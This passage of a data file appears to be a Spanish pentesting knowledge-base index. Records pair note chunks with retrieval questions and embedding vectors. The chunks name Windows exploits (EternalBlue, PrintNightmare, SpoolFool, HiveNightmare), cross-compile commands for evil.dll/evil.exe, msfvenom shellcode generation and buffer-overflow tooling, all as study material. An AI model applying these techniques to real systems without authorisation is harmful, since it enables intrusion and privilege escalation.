spooler\nSpoolFool CVE-2022-21999 β†’ privesc spooler\nHiveNightmare CVE-2021-36934 (SeriousSAM) β†’ lee SAM como user\n```\nPotato family (SeImpersonate) β†’ ver Potato attacks.", "indexar": "que tecnica sirve para obtener acceso remoto a un sistema Windows sin privilegios?", "v": [0.09932, 0.00375, -0.16109, -0.2362, 0.1033, -0.08784, -0.02195, -0.16493, -0.01016, 0.0, -0.06038, -0.12643, 0.01188, -0.01589, 0.09351, 0.00435, 0.05615, -0.04651, 0.04132, 0.04025, 0.02641, -0.07676, -0.05028, -0.04183, -0.00305, -0.0329, 0.11382, -0.09966, -0.14256, 0.01268, 0.11226, -0.0131, 0.0233, -0.05274, -0.00706, 0.01728, -0.00408, 0.17452, 0.0329, 0.04353, 0.06845, 0.00568, -0.04038, 0.03687, 0.13455, -0.1029, 0.11403, 0.05088, 0.05248, -0.01913, -0.0367, -0.02824, -0.06106, -0.14101, 0.02303, -0.05042, 0.12685, -0.0132, -0.03437, 0.0245, -0.05488, 0.00271, 0.01619, -0.0111, 0.04263, -0.08226, 0.02362, -0.05364, -0.02475, 0.09113, -0.09181, -0.07317, 0.11535, -0.01491, -0.01992, 0.01076, -0.13703, -0.0179, 0.0974, -0.09915, 0.0027, 0.07474, -0.12073, -0.07101, -0.06015, -0.14871, 0.05995, 0.03429, -0.00517, -0.15508, 0.13577, -0.03159, -0.01581, -0.0058, 0.11646, -0.02429, -0.0547, 0.00451, -0.04824, 0.01846, 0.02393, -0.07754, -0.08, 0.11093, -0.02668, 0.06167, 0.09617, -0.15041, -0.02632, -0.09075, -0.06858, 0.10862, -0.05635, 0.01634, -0.07892, 0.02371, -0.02273, -0.05413, -0.04552, 0.01958, -0.04937, -0.0352, -0.0191, -0.06146, 0.0542, -0.08531, -0.02429, 0.07144, -0.03563, 0.0593, 0.05047, -0.02386, -0.05358, -0.00267, -0.02938, 0.01523, 0.01562, -0.01769, -0.03627, -0.07314, 0.07259, 0.08561, -0.00583, -0.06319, 0.00975, -0.02132, 0.13374, -0.02027, -0.0286, -0.10957, -0.0276, -0.06076, -0.07025, -0.00821, -0.08269, -0.04845, -0.00016, -0.00139, -0.00942, 0.02844, 0.01091, 0.00855, -0.00735, -0.03657, 0.00969, 0.00634, -0.03886, -0.1113, 0.03509, -0.00586, -0.05959, 0.05983, -0.03316, -0.00897, -0.04821, 0.01557, 0.02939, -0.00431, 0.00033, 0.00813, -0.13819, 0.03429, 0.04215, -0.04719, 0.00478, 0.06024, -0.05422, 0.02959, 0.00649, 0.01356, -0.00117, -0.00574, 0.00243, 0.02224, -0.00717, -0.02733, -0.10762, -0.02976, 0.03639, 0.04891, -0.05228, 0.02516, 0.05045, -0.06154, 0.07719, 0.02903, 0.07651, -0.00955, 0.00478, 0.09435, 0.01447, -0.00179, 0.02627, -0.03596, -0.03525, -0.02964, 0.03087, -0.0345, -0.0159, -0.0503, 0.04611, -0.03944, 0.02127, 0.0567, 0.04552, -0.01147, -0.05031, 0.04597, 0.00635, -0.0678, 0.03168, -0.02593, 0.0437, 0.01317, 0.02908, -0.04318, 0.00017, -0.05699, -0.01186, -0.02533, -0.00982, 0.07297, -0.00074, -0.07713, -0.04986, -0.08787, -0.10024, -0.05184, -0.00408, -0.08417, -0.00143, -0.02635, 0.02643, -0.0193, -0.00265, 0.04904]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows\n```\nMS17-010 EternalBlue (SMBv1) β†’ foothold remoto\nPrintNightmare CVE-2021-1675 / 34527 β†’ privesc/RCE vΓ­a spooler\nSpoolFool CVE-2022-21999 β†’ privesc spooler\nHiveNightmare CVE-2021-36934 (SeriousSAM) β†’ lee SAM como user\n```\nPotato family (SeImpersonate) β†’ ver Potato attacks.", "indexar": "como puedo explotar vulnerabilidades del spooler de impresiones en windows?", "v": [0.2557, -0.06336, -0.21364, -0.10366, -0.07565, -0.07532, -0.049, -0.19531, 0.04329, -0.09876, -0.01517, -0.03721, 0.03789, -0.03919, -0.12171, 0.05093, 0.00753, -0.07637, -0.03495, 0.06089, -0.05976, -0.05162, -0.13672, -0.09741, -0.00296, 0.07374, -0.10147, 0.03982, -0.05225, -0.01274, -0.1315, 0.01381, 0.02009, -0.0747, 0.02181, 0.03654, -0.07579, 0.1392, 0.13953, 0.00724, 0.05415, 0.03137, -0.13152, 0.08845, 0.1264, -0.0691, -0.1119, -0.09182, 0.0535, 0.01125, -0.0801, 0.04274, -0.16735, -0.05394, 0.12284, -0.05166, 0.13042, -0.02907, 0.04114, 0.13057, -0.00856, 0.14799, -0.02801, 0.03136, 0.01208, -0.09037, -0.01306, 0.01859, 0.00069, 0.18552, -0.02563, 0.00681, -0.0475, 0.01405, 0.0302, -0.01138, -0.06828, -0.02611, 0.00091, -0.00239, -0.01082, 0.07596, 0.01206, -0.08158, -0.05684, -0.09767, 0.04651, -0.04837, 0.01671, -0.08982, 0.08258, -0.04651, -0.13662, 0.09842, 0.00671, -0.07462, 0.04401, 0.0784, -0.02505, 0.01085, -0.07544, -0.00273, -0.01994, 0.13111, 0.05884, 0.08662, -0.04608, -0.04542, 0.00122, -0.09525, 0.01015, 0.03284, -0.02942, -0.0041, -0.00372, -0.03581, -0.04333, -0.1092, 0.03906, 0.03982, -0.01248, -0.0961, -0.03404, -0.01444, 0.02567, -0.02844, -0.0233, 0.04146, -0.04638, 0.02929, -0.03167, 0.04927, 0.04349, 0.04312, 0.02806, 0.01855, -0.02863, -0.06045, 0.01138, -0.08963, 0.05658, 0.05714, 0.0499, 0.02241, -0.02233, 0.12178, 0.02383, -0.00861, -0.05922, -0.01961, 0.06984, -0.01313, -0.01179, 0.0834, -0.00344, -0.00447, -0.03991, 0.07739, 0.08849, 0.04292, 0.0068, 0.01366, 0.00277, 0.08156, 0.02231, -0.00232, -0.03603, -0.04349, 0.03105, 0.00867, -0.0229, 0.07821, 0.04521, 0.03258, 0.05499, 0.01298, 0.01637, -0.04125, -0.05408, -0.03509, -0.05638, 0.05109, -0.00843, -0.01544, -0.03276, 0.04672, -0.05001, 0.00826, 0.00569, 0.00297, -0.02029, -0.06306, -0.00113, 0.03362, 0.05815, -0.0767, -0.01232, 0.00661, 0.01452, -0.03606, -0.0478, -0.01195, -0.05763, -0.01591, 0.11367, 0.09562, -0.0401, 0.01952, -0.05445, 0.08245, -0.00226, 0.02064, 0.05267, -0.04764, -0.10536, -0.01131, 0.03753, 0.01886, -0.01267, -0.03173, 0.01862, 0.0063, 0.04579, 0.00736, 0.00327, -0.01336, -0.08427, -0.05823, -0.01836, 0.03607, 0.02542, 0.02239, -0.06363, -0.04462, 0.00771, 0.01678, -0.01004, -0.04532, 0.01478, -0.01137, 0.00019, 0.00607, 0.00327, -0.00965, 0.00193, -0.03202, -0.05537, 0.01939, 0.02158, -0.02974, -0.02227, 0.05767, 0.01858, -0.01193, -0.00033, -0.02586]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows\n```\nMS17-010 EternalBlue (SMBv1) β†’ foothold remoto\nPrintNightmare CVE-2021-1675 / 34527 β†’ privesc/RCE vΓ­a spooler\nSpoolFool CVE-2022-21999 β†’ privesc spooler\nHiveNightmare CVE-2021-36934 (SeriousSAM) β†’ lee SAM como user\n```\nPotato family (SeImpersonate) β†’ ver Potato attacks.", "indexar": "cual es una alternativa libre para realizar ataques de escalada de privilegios en el servicio spooler?", "v": [0.17994, -0.01241, -0.28361, -0.03186, -0.11074, -0.12935, 0.03794, -0.15517, -0.03534, 0.04022, -0.04723, -0.10981, 0.00816, -0.0726, 0.06119, -0.11371, 0.0359, -0.02926, 0.11467, 0.12589, -0.06132, 0.00887, -0.04923, -0.04588, -0.02618, -0.01679, -0.02686, 0.09605, -0.11766, -0.05025, 0.00914, 0.02209, -0.04148, -0.06003, 0.14694, -0.0355, 0.07447, 0.15288, 0.09866, -0.12833, -0.09666, -0.07782, -0.14578, -0.09101, 0.04831, -0.06891, -0.0709, 0.08693, 0.02671, 0.02564, 0.0516, 0.0276, -0.10234, -0.13896, 0.05236, 0.01198, 0.09263, -0.07888, -0.04365, 0.00779, -0.07712, 0.03564, -0.00366, -0.00916, 0.05953, -0.115, -0.10156, -0.02693, -0.06093, 0.08945, -0.01226, -0.07647, -0.00391, 0.02549, -0.07598, -0.00273, -0.07079, -0.01063, -0.0022, 0.0362, 0.05792, -0.03826, -0.0567, 0.05436, -0.12743, -0.04926, 0.01834, -0.05127, -0.01694, 0.05014, 0.10268, 0.06344, -0.0418, 0.03308, -0.03679, -0.06678, 0.02447, 0.0321, 0.02065, 0.01712, 0.04786, -0.00599, -0.07986, 0.14543, 0.06227, 0.02313, -0.04296, -0.04315, -0.06721, -0.08607, -0.0439, 0.02291, 0.03704, 0.03004, -0.06917, -0.08198, -0.06461, -0.07413, 0.03723, -0.01344, -0.05885, -0.0726, 0.02046, -0.02338, 0.0586, -0.00602, 0.01242, 0.00816, -0.0343, -0.00837, 0.01716, 0.04807, 0.04013, -0.03074, -0.0312, -0.03032, 0.03947, -0.09033, 0.0604, -0.0374, 0.08165, 0.0661, -0.03001, -0.02231, 0.05652, 0.01514, 0.00298, -0.0969, -0.07422, -0.03092, -0.04136, 0.03508, -0.04705, 0.17217, -0.02606, -0.07451, -0.07272, -0.06259, -0.04912, 0.18803, 0.04289, -0.02477, 0.01206, 0.0418, 0.00387, -0.00326, 0.01849, -0.05561, -0.06368, -0.03511, -0.01746, 0.07048, -0.00521, -0.03589, 0.06116, -0.02948, -0.05474, -0.10086, 0.04531, -0.00668, -0.05149, 0.01896, -0.01945, -0.01255, -0.03624, -0.08205, 0.03374, -0.01461, 0.0428, 0.0415, -0.04291, -0.03708, -0.04869, 0.00188, 0.00792, -0.10991, -0.01019, -0.03399, -0.00888, -0.02272, -0.04432, -0.0657, -0.04107, -0.02333, -0.01592, 0.00265, 0.01569, -0.03277, -0.02534, 0.12113, 0.05938, 0.00506, 0.08883, -0.0148, -0.06626, 0.01531, 0.08016, -0.01548, -0.01728, -0.04109, -0.02575, -0.01172, 0.04544, 0.03579, -0.0197, -0.02339, -0.0016, -0.02374, -0.01892, 0.0267, 0.0352, -0.02183, -0.004, -0.02821, 0.02546, 0.01773, 0.06688, 0.01, 0.01287, -0.02808, 0.02733, 0.08175, -0.01407, 0.01286, -0.01896, -0.02124, -0.08011, -0.01268, -0.02477, -0.04463, 0.00706, 0.01429, -0.0227, 0.02498, 0.04098, -0.00268]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Compilar\n```bash\ngcc exploit.c -o exploit # Linux\nx86_64-w64-mingw32-gcc evil.c -shared -o evil.dll # DLL Windows (cross-compile)\ni686-w64-mingw32-gcc evil.c -o evil.exe # EXE 32-bit\n```\nPara shellcode listo: msfvenom `-f exe` / `-f dll`.\n\n> ⚠️ Hay PoCs falsos/maliciosos. Lee el cΓ³digo antes de ejecutar (searchsploit).\n\nRelacionado: Privesc Windows Β· Privesc Linux Β· OSCP MOC", "indexar": "que programa puedo usar para compilar un exploit en Linux o Windows?", "v": [-0.08748, 0.05941, -0.17296, -0.18149, 0.03357, -0.15418, -0.14811, 0.02071, -0.10766, -0.08381, 0.00911, -0.11345, -0.00317, -0.01569, -0.10829, -0.12868, -0.06121, -0.15575, 0.00109, -0.06384, -0.06367, 0.08179, -0.08749, -0.00822, 0.03852, 0.10615, 0.07921, -0.1185, 0.02276, -0.02455, -0.05881, 0.05472, 0.01384, -0.05279, -0.04291, 0.03452, -0.00123, 0.02314, 0.10359, 0.10402, 0.09234, 0.02, -0.0798, 0.07571, 0.00863, -0.08822, 0.07394, -0.08084, 0.04519, -0.09643, 0.04792, 0.01619, -0.10001, -0.00705, 0.13836, -0.08149, 0.06617, -0.15324, -0.01875, 0.05424, -0.04631, 0.04331, -0.02734, 0.0172, 0.03436, -0.02621, -0.01363, -0.02642, -0.1031, 0.13642, -0.0244, 0.14486, 0.00798, -0.0128, 0.02817, 0.06284, -0.10232, -0.04152, 0.07996, -0.03848, -0.00136, -0.02679, 0.04512, -0.00014, -0.1009, -0.18071, 0.07962, -0.00054, -0.00163, -0.05149, 0.04981, -0.00623, -0.06681, 0.05719, 0.11664, -0.09176, 0.1408, 0.07089, 0.01001, 0.04923, -0.0306, -0.06115, -0.10981, 0.12051, -0.02713, 0.08689, 0.04479, -0.07925, -0.03728, -0.04214, 0.041, -0.00403, -0.05175, -0.02063, -0.09663, -0.00656, -0.02039, -0.03781, -0.0055, -0.00072, -0.06717, 0.01922, -0.06457, 0.00882, 0.05687, -0.044, -0.08127, 0.17292, -0.09816, -0.01039, 0.0167, -0.05642, -0.01777, 0.00105, -0.09922, -0.01912, 0.03152, -0.07806, 0.06004, -0.03321, 0.06597, 0.12434, 0.02629, 0.04366, 0.07467, 0.02822, 0.01092, -0.00803, -0.01574, -0.08652, 0.04155, 0.00158, -0.02667, 0.02257, -0.11161, -0.02517, 0.09157, 0.07158, 0.01741, -0.00643, -0.03029, -0.03783, -0.01577, -0.02907, -0.00209, -0.01398, -0.00258, 0.02978, 0.03054, 0.03323, 0.01502, 0.13394, 0.01697, -0.04711, 0.03376, -0.06404, 0.03317, -0.03082, -0.03209, -0.00539, -0.06721, 0.03004, 0.04531, -0.00945, -0.00357, 0.04956, -0.03725, 0.05059, -0.03481, -0.0104, -0.01717, 0.0399, 0.04887, -0.028, -0.02753, 0.02224, -0.05163, 0.00569, 0.03773, -0.01321, -0.08544, 0.01002, -0.02951, -0.04358, 0.09456, 0.04751, -0.08355, 0.01439, 0.03139, 0.0618, 0.01895, 0.00345, 0.0214, -0.02901, -0.02053, -0.04582, 0.04449, 0.05662, 0.02495, -0.02479, -0.00283, 0.03102, 0.05748, 0.0285, -0.01182, -0.08823, -0.02999, -0.0037, 0.00412, 0.01989, 0.00015, -0.00707, -0.00323, -0.00159, -0.00707, -0.01313, -0.00721, -0.00414, -0.01488, -0.04009, -0.06216, 0.09134, -0.0037, -0.06423, -0.07279, -0.02432, -0.04101, -0.00697, -0.01508, -0.04991, -0.02455, 0.00639, 0.0287, -0.04955, -0.02879, 0.0788]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Compilar\n```bash\ngcc exploit.c -o exploit # Linux\nx86_64-w64-mingw32-gcc evil.c -shared -o evil.dll # DLL Windows (cross-compile)\ni686-w64-mingw32-gcc evil.c -o evil.exe # EXE 32-bit\n```\nPara shellcode listo: msfvenom `-f exe` / `-f dll`.\n\n> ⚠️ Hay PoCs falsos/maliciosos. Lee el cΓ³digo antes de ejecutar (searchsploit).\n\nRelacionado: Privesc Windows Β· Privesc Linux Β· OSCP MOC", "indexar": "con que herramienta genero shellcode listo para ejecutar?", "v": [-0.02227, -0.12018, -0.18305, -0.10594, -0.01677, -0.15982, -0.06743, 0.02077, -0.02566, -0.10862, -0.09916, -0.01296, -0.00221, -0.1803, 0.13482, 0.02608, 0.02642, -0.06887, -0.03938, 0.0016, -0.04734, 0.03066, -0.05273, -0.12603, -0.04326, -0.01943, -0.02546, 0.05907, -0.13625, 0.04659, -0.05457, -0.10789, 0.01355, -0.15389, -0.07613, 0.03163, 0.01407, 0.03498, -0.11674, 0.18807, -0.06672, 0.06188, -0.12522, 0.07674, -0.00503, -0.01853, 0.04484, 0.03503, 0.11611, 0.12188, -0.0011, -0.13692, -0.17404, -0.01329, 0.04479, -0.09354, 0.18031, -0.11455, -0.10349, -0.09246, -0.10748, -0.05448, 0.07342, -0.05615, -0.06779, 0.08774, 0.0017, -0.06699, -0.0882, 0.04966, -0.06603, 0.04231, 0.04969, 0.05048, -0.01913, -0.04426, -0.00174, 0.00342, 0.02099, 0.07207, -0.01645, -0.02533, -0.07076, 0.04996, -0.04678, -0.08022, 0.0149, -0.05496, 0.07194, -0.0774, 0.0235, -0.00262, -0.04969, 0.0863, 0.06247, 0.01118, 0.01124, -0.03515, -0.00385, 0.01915, 0.13902, -0.08327, -0.07392, 0.08309, 0.12235, 0.05864, -0.08653, 0.10805, -0.04029, 0.06213, 0.0302, -0.02124, 0.03669, 0.00058, -0.02909, 0.03438, -0.04223, -0.07382, 0.07351, -0.13737, 0.00605, 0.08718, -0.1128, 0.03973, 0.00589, 0.01105, -0.06127, 0.06323, -0.05353, -0.08892, -0.02265, -0.02909, -0.06342, 0.0188, -0.05892, 0.04248, 0.01852, -0.06444, 0.0144, -0.07709, 0.0304, 0.03061, -0.05699, 0.04511, -0.00897, -0.00471, 0.00986, -0.01809, -0.02072, 0.02272, 0.07173, 0.00499, -0.05838, 0.03841, -0.08863, -0.05083, -0.01784, 0.06947, -0.01439, -0.00868, -0.05821, -0.10017, -0.00565, -0.02943, 0.03393, -0.03495, 0.05643, 0.02894, 0.01836, 0.06264, 0.08979, 0.05315, 0.10491, -0.02238, -0.00038, -0.0563, -0.06571, 0.01116, -0.02217, -0.032, -0.03911, 0.02641, -0.03094, -0.09235, 0.00665, -0.0168, 0.0393, -0.03411, -0.05685, 0.06814, 0.00385, 0.04101, 0.06201, -0.04159, 0.06129, 0.07386, 0.04853, -0.02413, -0.00608, -0.02541, -0.0202, 0.00507, 0.05317, -0.06164, 0.00042, 0.05, -0.01422, -0.03895, -0.02951, -0.02571, 0.02608, 0.03824, 0.03058, 0.00995, 0.01001, -0.01289, -0.0551, 0.05572, 0.04018, 0.01103, 0.00461, 0.00133, 0.06107, -0.02669, -0.00905, 0.00883, -0.0249, -0.0514, -0.02688, -0.03487, 0.01774, -0.04352, 0.03482, 0.02354, 0.00556, -0.05094, 0.00352, -0.00521, -0.02637, -0.00537, -0.02226, 0.04104, 0.00624, -0.03639, -0.0422, -0.00792, 0.01314, -0.07096, -0.05709, -0.07813, -0.02593, 0.00349, 0.01762, -0.06284, -0.00796, -0.01464]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Compilar\n```bash\ngcc exploit.c -o exploit # Linux\nx86_64-w64-mingw32-gcc evil.c -shared -o evil.dll # DLL Windows (cross-compile)\ni686-w64-mingw32-gcc evil.c -o evil.exe # EXE 32-bit\n```\nPara shellcode listo: msfvenom `-f exe` / `-f dll`.\n\n> ⚠️ Hay PoCs falsos/maliciosos. Lee el cΓ³digo antes de ejecutar (searchsploit).\n\nRelacionado: Privesc Windows Β· Privesc Linux Β· OSCP MOC", "indexar": "existe alguna alternativa libre a msfvenom para empaquetar exploits?", "v": [0.0171, 0.02285, -0.12273, 0.11262, -0.17152, 0.04888, -0.15913, 0.01595, -0.23237, -0.07659, -0.02425, -0.05183, 0.09266, 0.17137, 0.08856, -0.02153, 0.08575, -0.11126, 0.10737, -0.01145, 0.01245, 0.03478, -0.09173, -0.05696, -0.07183, -0.01327, -0.05756, -0.04395, -0.07571, -0.08617, 0.06832, 0.08161, -0.01131, -0.03031, 0.03537, -0.01791, 0.2222, -0.09777, 0.19, 0.0317, 0.13495, -0.11683, -0.08766, 0.0427, 0.00893, -0.05731, -0.25157, 0.05658, 0.02044, 0.11326, -0.01503, -0.06985, -0.05967, 0.04166, 0.03534, -0.00335, 0.07892, -0.07966, -0.08524, 0.05643, -0.06248, -0.0415, -0.024, -0.13396, 0.0607, -0.02331, -0.02469, 0.03653, -0.03399, 0.16672, 0.02732, -0.02584, 0.07788, 0.0184, -0.13438, -0.04515, 0.00309, 0.01708, -0.02924, 0.13596, -0.00557, -0.09494, -0.06143, 0.02173, -0.02867, -0.06346, 0.12028, -0.08641, 0.01008, -0.04565, 0.0308, 0.03666, -0.03991, 0.06988, -0.00529, -0.1065, 0.00658, 0.02127, 0.03082, 0.06739, 0.0556, 0.03954, -0.06835, -0.00605, 0.01276, -0.01399, 0.04666, 0.00991, -0.06436, 0.00624, 0.01915, -0.01337, -0.01453, -0.02075, -0.02455, 0.00566, -0.03187, -0.01931, 0.00493, -0.00538, -0.03855, -0.04897, -0.05802, -0.02146, -0.02579, 0.03539, 0.04917, 0.07663, -0.06562, 0.05411, 0.05683, -0.07306, -0.01362, -0.07396, -0.07942, -0.11193, 0.04704, -0.02698, -0.00644, -0.03099, 0.03933, 0.04238, -0.0395, -0.00232, -0.05684, -0.02882, 0.0222, -0.05292, 0.01273, -0.08538, -0.10032, -0.07035, -0.04934, 0.07033, 0.01767, 0.04139, 0.04078, 0.03037, -0.04363, 0.12416, -0.01349, -0.04516, -0.01629, -0.00393, -0.03508, 0.00036, 0.02334, -0.04373, -0.07712, 0.02655, -0.00229, 0.07724, 0.15266, -0.05823, 0.06193, -0.06573, -0.05914, -0.06323, 0.03096, -0.00526, 0.06649, 0.02024, 0.01319, 0.02051, 0.00666, -0.02068, 0.06332, 0.03501, -0.0401, -0.02128, 0.04049, -0.04435, 0.00786, 0.00174, -0.02881, 0.04049, 0.00481, -0.03115, -0.0185, -0.05643, -0.02082, 0.01908, 0.03952, -0.03055, -0.03278, -0.02094, -0.0003, 0.02625, -0.01189, 0.02195, 0.0439, 0.03141, 0.0059, -0.04348, -0.04031, 0.00808, 0.00648, 0.03706, 0.01875, -0.048, 0.04206, 0.03552, -0.00201, 0.04508, 0.00042, 0.03949, -0.05904, -0.01389, -0.01479, 0.01727, 0.0411, -0.01771, 0.02065, 0.04728, -0.02051, -0.05115, 0.04333, 0.04242, 0.06053, 0.0151, -0.01957, 0.03765, -0.01409, 0.00443, -0.02769, 0.01587, -0.04849, -0.03634, -0.04081, 0.03261, 0.01221, -0.02902, -0.03443, 0.00317, 0.05221, 0.05797]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Buffer Overflow (stack, 32-bit)\n\n> El clΓ‘sico stack BOF de Windows. En el OSCP actual pesa menos (el examen va mΓ‘s a AD), pero sigue cayendo. MetodologΓ­a de 7 pasos. Fuente: oscp.trastero.org/b0f.\n> Herramientas: **Immunity Debugger + mona.py**, `msf-pattern_create/offset`, `msfvenom`, `nc`.", "indexar": "que programa puedo usar para crear patrones de desbordamiento de pila en Windows?", "v": [-0.02336, 0.01729, -0.18193, -0.12765, 0.06144, -0.05243, 0.11287, -0.12882, -0.13451, -0.24901, -0.0325, 0.00506, 0.01667, -0.10798, -0.16269, -0.05238, -0.03882, -0.06378, 0.07702, 0.00194, -0.05778, 0.03628, -0.06841, 0.0403, -0.04588, 0.03763, 0.13693, -0.05516, -0.12922, 0.08273, -0.00582, 0.02446, 0.07345, -0.08835, 0.0107, -0.08807, -0.03648, 0.01375, -0.01616, 0.09292, -0.05509, 0.13097, -0.06159, 0.01323, 0.05504, 0.05268, 0.07355, -0.03917, -0.03067, 0.11295, -0.02788, -0.01642, -0.07202, -0.05034, 0.13675, -0.16612, 0.03844, -0.0934, -0.08213, 0.00636, -0.02436, 0.09347, 0.01242, -9e-05, 0.05286, -0.01464, 0.01619, 0.0125, -0.0258, 0.13312, -0.0452, -0.07648, 0.05656, -0.06688, 0.08084, 0.04202, -0.03656, -0.02722, 0.03468, -0.02719, -0.00754, -0.00277, 0.00736, -0.01919, -0.09092, -0.06862, -0.00442, -0.02329, -0.01937, -0.15237, 0.05947, 0.02307, -0.01195, 0.11102, 0.02002, -0.10358, 0.08056, 0.04243, 0.02081, 0.08026, 0.06724, -0.10258, 0.03245, 0.10501, 0.04687, 0.0312, 0.06465, -0.12018, -0.05874, -0.0234, 0.00373, 0.04287, -0.06141, -0.03595, -0.11326, -0.03001, -0.00084, -0.0304, -0.03322, -0.02761, -0.03349, 0.01757, -0.09078, 0.05675, 0.07221, -0.03925, 0.01057, 0.14897, -0.06809, 0.11363, 0.03556, 0.01035, -0.04699, -0.04887, -0.09629, -0.04667, 0.01041, -0.00761, 0.03266, -0.07951, 0.07448, 0.10957, -0.00468, -0.01376, 0.00697, 0.02159, 0.00421, -0.05751, -0.0783, 0.03302, 0.04122, 0.04426, -0.02105, 0.00029, -0.07566, 0.01861, 0.02927, 0.08854, 0.00918, -0.01173, -0.04496, -0.00624, -0.00439, -0.03892, 0.06439, -0.05063, -0.03624, 0.03321, 0.08139, 0.01963, -0.03396, 0.08041, -0.01088, -0.02717, 0.06935, -0.00837, -0.04188, -0.02756, -0.02075, -0.01139, -0.0977, 0.04657, 0.01035, -0.03734, -0.02093, -0.02922, 0.01256, 0.0582, -0.03862, 0.02379, -0.0631, 0.0172, 0.04599, -0.04293, -0.01222, -0.03911, -0.00977, 0.00182, 0.08583, -0.06839, 0.00589, 0.02199, -0.05381, -0.04344, 0.14492, 0.0496, -0.07135, 0.03753, 0.07579, 0.11318, 0.0708, -0.05924, 0.03313, -0.07034, -0.03993, -0.02485, -0.00313, -0.01136, 0.03743, 0.0004, 0.02014, 0.02032, 0.05862, 0.08139, -0.00425, -0.08421, -0.03907, 0.02431, 0.03209, 0.00678, 0.01177, -0.00992, 0.02805, -0.0487, 0.00054, 0.04725, -0.00021, -0.05834, -0.00261, -0.04023, -0.06454, 0.07503, -0.02361, -0.04835, -0.01829, -0.03597, -0.03641, 0.00784, -0.03975, -0.05296, -0.00295, -0.00771, 0.03256, -0.0445, -0.01362, 0.10691]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Buffer Overflow (stack, 32-bit)\n\n> El clΓ‘sico stack BOF de Windows. En el OSCP actual pesa menos (el examen va mΓ‘s a AD), pero sigue cayendo. MetodologΓ­a de 7 pasos. Fuente: oscp.trastero.org/b0f.\n> Herramientas: **Immunity Debugger + mona.py**, `msf-pattern_create/offset`, `msfvenom`, `nc`.", "indexar": "cual es una herramienta para generar payloads de buffer overflow?", "v": [0.12109, 0.02834, -0.1165, -0.09382, 0.00882, -0.02658, 0.00404, -0.00477, -0.07035, -0.04118, -0.171, 0.02915, -0.05368, 0.03173, -0.10489, 0.06553, -0.0764, -0.0907, -0.06816, 0.04168, -0.02599, 0.07886, -0.07243, -0.05288, -0.08977, 0.10062, -0.03257, -0.05215, -0.2996, 0.03786, 0.06801, 0.02127, 0.08496, -0.04548, -0.0732, -0.02337, 0.00422, 0.16722, -0.06847, 0.10177, -0.01191, 0.09709, -0.14037, 0.10434, 0.06356, 0.00148, -0.00084, 0.07583, 0.10446, -0.02153, 0.0164, -0.05427, -0.07114, 0.09289, -0.0388, -0.12384, 0.18583, -0.18426, 0.01057, -0.02149, -0.07386, 0.10795, -0.03176, -0.06374, -0.09665, -0.09419, -0.01579, -0.0115, -0.12112, 0.03149, 0.02804, -0.00411, 0.04279, 0.03548, 0.03042, 0.01629, 0.00137, 0.05649, 0.03816, 0.11936, 0.0506, -0.00124, -0.05318, 0.06948, -0.06109, -0.04275, 0.05662, -0.03093, 0.06626, -0.03796, -0.0314, 0.05626, -0.01433, 0.09031, 0.01195, -0.05197, 0.15987, -0.05832, 0.00581, -0.02034, 0.14187, -0.04538, -0.00211, 0.00748, 0.06941, 0.04888, -0.0531, -0.10026, -0.03127, -0.08421, 0.13238, -0.02603, 0.1294, 0.06312, -0.01153, 0.00262, -0.00689, 0.01992, 0.04409, -0.04079, 0.02172, 0.02732, -0.03357, -0.06608, 0.02905, -0.06434, -0.05945, 0.07122, 0.01263, -0.02701, 0.00432, 0.06134, -0.03699, 0.02809, -0.00687, -0.12012, 0.0691, -0.08597, -0.01924, -0.03796, 0.04539, 0.03962, 0.02545, -0.01639, 0.02165, 0.0191, -0.00484, -0.05744, -0.08854, -0.09069, 0.04308, 0.00359, -0.0114, 0.00385, -0.0325, -0.03315, 0.01031, 0.02583, -0.06111, -0.00306, -0.0249, -0.02095, 0.00776, 0.00353, 0.00117, -0.05712, -0.01203, 0.01322, -0.01142, 0.09036, 0.02824, -0.06056, 0.07876, -0.05119, -0.01843, -0.06979, -0.09858, -0.06857, 0.02577, -0.08122, -0.10684, -0.00491, -0.01081, 0.05321, 0.00775, -0.09563, 0.00213, 0.01426, 0.03527, 0.10638, 0.06798, 0.04246, 0.02053, -0.10167, -0.00344, -0.02131, -0.04276, -0.03425, 0.05791, -0.00863, 0.04964, -0.03127, -0.03301, -0.04352, -0.02662, 0.03672, -0.03017, -0.04768, 0.00522, -0.01503, 0.07073, -0.03709, 0.07081, -0.05248, -0.04098, -0.00227, -0.04084, -0.02243, 0.00526, 0.00976, 0.03086, 0.02477, 0.05569, -0.03785, -0.04422, 0.06356, 0.04218, 0.01262, 0.03386, -0.02443, 0.00751, 0.01418, 0.00464, 0.00282, 0.06725, -0.00866, 0.01171, -0.01835, -0.04894, -0.04258, 0.0626, 0.00499, -0.01513, -0.09009, -0.02752, -0.02268, -0.00614, 0.00805, -0.03299, -0.06119, -0.01713, 0.04302, -0.00671, 0.0031, 0.07471, -0.02562]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Buffer Overflow (stack, 32-bit)\n\n> El clΓ‘sico stack BOF de Windows. En el OSCP actual pesa menos (el examen va mΓ‘s a 